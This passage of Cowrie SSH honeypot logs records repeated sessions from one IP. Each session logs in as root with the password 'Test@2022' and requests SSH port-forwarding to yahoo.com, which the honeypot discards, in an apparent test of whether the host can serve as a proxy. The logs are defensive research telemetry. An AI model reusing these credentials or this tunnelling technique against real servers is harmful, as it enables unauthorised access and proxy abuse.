ellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.888194Z","src_ip":"213.209.150.239","session":"c171cc0fe3ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.123338Z","src_ip":"213.209.150.239","session":"c171cc0fe3ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":21550,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:21550","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.171586Z","session":"c171cc0fe3ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.218896Z","src_ip":"213.209.150.239","session":"c171cc0fe3ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14675,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14675","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.353520Z","session":"c171cc0fe3ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.400861Z","src_ip":"213.209.150.239","session":"c171cc0fe3ad"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.449475Z","src_ip":"213.209.150.239","session":"c171cc0fe3ad"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39239,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d9964bf69d0","protocol":"ssh","message":"New connection: 213.209.150.239:39239 (1.2.3.4:22) [session: 4d9964bf69d0]","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.505059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.506051Z","src_ip":"213.209.150.239","session":"4d9964bf69d0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.562472Z","src_ip":"213.209.150.239","session":"4d9964bf69d0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.844473Z","src_ip":"213.209.150.239","session":"4d9964bf69d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":12815,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:12815","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.901788Z","session":"4d9964bf69d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:56.958478Z","src_ip":"213.209.150.239","session":"4d9964bf69d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":25421,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25421","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.114947Z","session":"4d9964bf69d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.171606Z","src_ip":"213.209.150.239","session":"4d9964bf69d0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.228984Z","src_ip":"213.209.150.239","session":"4d9964bf69d0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39297,"dst_ip":"1.2.3.4","dst_port":22,"session":"a24d7f787c68","protocol":"ssh","message":"New connection: 213.209.150.239:39297 (1.2.3.4:22) [session: a24d7f787c68]","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.275272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.275997Z","src_ip":"213.209.150.239","session":"a24d7f787c68"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.323294Z","src_ip":"213.209.150.239","session":"a24d7f787c68"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.558169Z","src_ip":"213.209.150.239","session":"a24d7f787c68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":32362,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:32362","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.606836Z","session":"a24d7f787c68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.654069Z","src_ip":"213.209.150.239","session":"a24d7f787c68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":28310,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28310","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.789573Z","session":"a24d7f787c68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.836895Z","src_ip":"213.209.150.239","session":"a24d7f787c68"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.884776Z","src_ip":"213.209.150.239","session":"a24d7f787c68"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39352,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba232faa324f","protocol":"ssh","message":"New connection: 213.209.150.239:39352 (1.2.3.4:22) [session: ba232faa324f]","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.940589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.941469Z","src_ip":"213.209.150.239","session":"ba232faa324f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:57.998072Z","src_ip":"213.209.150.239","session":"ba232faa324f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.280488Z","src_ip":"213.209.150.239","session":"ba232faa324f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":15847,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15847","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.338177Z","session":"ba232faa324f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.395211Z","src_ip":"213.209.150.239","session":"ba232faa324f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22590,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22590","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.551093Z","session":"ba232faa324f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.607952Z","src_ip":"213.209.150.239","session":"ba232faa324f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.665580Z","src_ip":"213.209.150.239","session":"ba232faa324f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39411,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c1c3d240bb3","protocol":"ssh","message":"New connection: 213.209.150.239:39411 (1.2.3.4:22) [session: 8c1c3d240bb3]","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.711648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.712602Z","src_ip":"213.209.150.239","session":"8c1c3d240bb3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.760059Z","src_ip":"213.209.150.239","session":"8c1c3d240bb3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:58.994839Z","src_ip":"213.209.150.239","session":"8c1c3d240bb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":16955,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:16955","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.043080Z","session":"8c1c3d240bb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.090387Z","src_ip":"213.209.150.239","session":"8c1c3d240bb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":19654,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19654","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.225626Z","session":"8c1c3d240bb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.273036Z","src_ip":"213.209.150.239","session":"8c1c3d240bb3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.321691Z","src_ip":"213.209.150.239","session":"8c1c3d240bb3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39459,"dst_ip":"1.2.3.4","dst_port":22,"session":"1543f040a636","protocol":"ssh","message":"New connection: 213.209.150.239:39459 (1.2.3.4:22) [session: 1543f040a636]","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.377163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.378076Z","src_ip":"213.209.150.239","session":"1543f040a636"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.434520Z","src_ip":"213.209.150.239","session":"1543f040a636"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.715990Z","src_ip":"213.209.150.239","session":"1543f040a636"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20989,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20989","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.773323Z","session":"1543f040a636"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:59.829944Z","src_ip":"213.209.150.239","session":"1543f040a636"}
